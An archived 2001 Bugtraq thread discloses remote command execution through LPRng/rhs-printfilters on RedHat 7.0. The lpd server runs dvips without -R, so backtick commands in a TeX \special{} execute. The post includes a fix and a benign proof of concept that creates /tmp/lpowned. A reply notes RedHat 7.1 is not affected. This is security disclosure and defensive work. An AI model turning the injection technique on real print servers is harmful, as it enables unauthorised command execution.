6986564 2001-08-28 01:44 +1200  /71 rader/ zen-parse <zen-parse@gmx.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-27  17:43  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18966>
Ärende: LPRng/rhs-printfilters - remote execution of commands
------------------------------------------------------------
From: zen-parse <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108280131001.984-100000@clarity.local>

(posted to vendor security ppl, no reply, no patch, so posting here.)
--begin forwarded message--

RedHat 7.0 (possibly others)

If the lpd is listening on 0.0.0.0 and no access controls are in
place, it is possible to execute commands as the lp user, assuming
tetex-dvips is installed.

From man dvips
...
       -R     Run in secure mode. This  means  that  ``backtick''
              commands  from  a \special{} or \psffile{} macro in
              the  (La)TeX  source  like   \special{psfile="`zcat
              foo.ps.Z"}   or   \psffile[72  72  540  720]{"`zcat
              screendump.ps.gz"} are not executed.
...

Unless the -R option is passed, the attached file will, when
converted to a .dvi file (tex spool.tex), start a worm. A very
primitive, proof of concept worm, with no payload, but it does stall
the printer.  (So don't run it without at least modifying it to do
something else.)

/usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi
...
dvips -f $DVIPS_OPTIONS < $TMP_FILE
...

change it to
...
dvips -R -f $DVIPS_OPTIONS < $TMP_FILE
...

and it should be a little safer.

-- zen-parse

--end forwarded message--

I deleted the worm file before posting this to BugTraq. It's 2 lines
of bash, but not really the kind of thing that is helpful to post
here.

-rw-r--r--    1 evil     evil          152 Aug 16 16:37 spool.tex

Instead, use this to test your machine.

cat >proof-of-concept.tex <<EOF
\special{psfile="`touch /tmp/lpowned"}
\end
EOF
tex proof-of-concept
lpr proof-of-concept.dvi

-- zen-parse

             [ mp3.com/cosv  -  new music added this month ]
             [ ============ ] [ ========================== ]
-- 
-------------------------------------------------------------------------
The preceding information, unless directly posted by zen-parse@gmx.net to
an open forum is confidential information and not to be distributed
(without explicit permission being given by zen-parse@gmx.net). Legal
action may be taken to enforce this. If you are mum or dad, this probably
doesn't apply to you.
(6986564) /zen-parse <zen-parse@gmx.net>/-(Ombruten)
6988595 2001-08-27 16:54 -0400  /22 rader/ Matt Bing <mbing@nfr.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-27  23:39  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18972>
Ärende: Re: LPRng/rhs-printfilters - remote execution of commands
------------------------------------------------------------
From: Matt Bing <mbing@nfr.net>
To: bugtraq@securityfocus.com
Message-ID: <20010827165434.A23344@karloff.bing.nfr.net>

> RedHat 7.0 (possibly others)

Redhat 7.1 is not vulnerable. If tetex-dvips is installed, the filter
/usr/share/printconf/mf_rules/mf40-tetex_filters contains the '-R' 
switch:

#
# tetex filters
#

/dvi/  fpipe/postscript/       /usr/bin/dvips -t PAGEsize ifdef(`XDPI',-X XDPI -Y YDPI, ifdef(`DPI',-D DPI,-D 600)) -R -q -f $FILE

-- 
Matt Bing
NFR Security
Rapid Response Team
(6988595) /Matt Bing <mbing@nfr.net>/---------------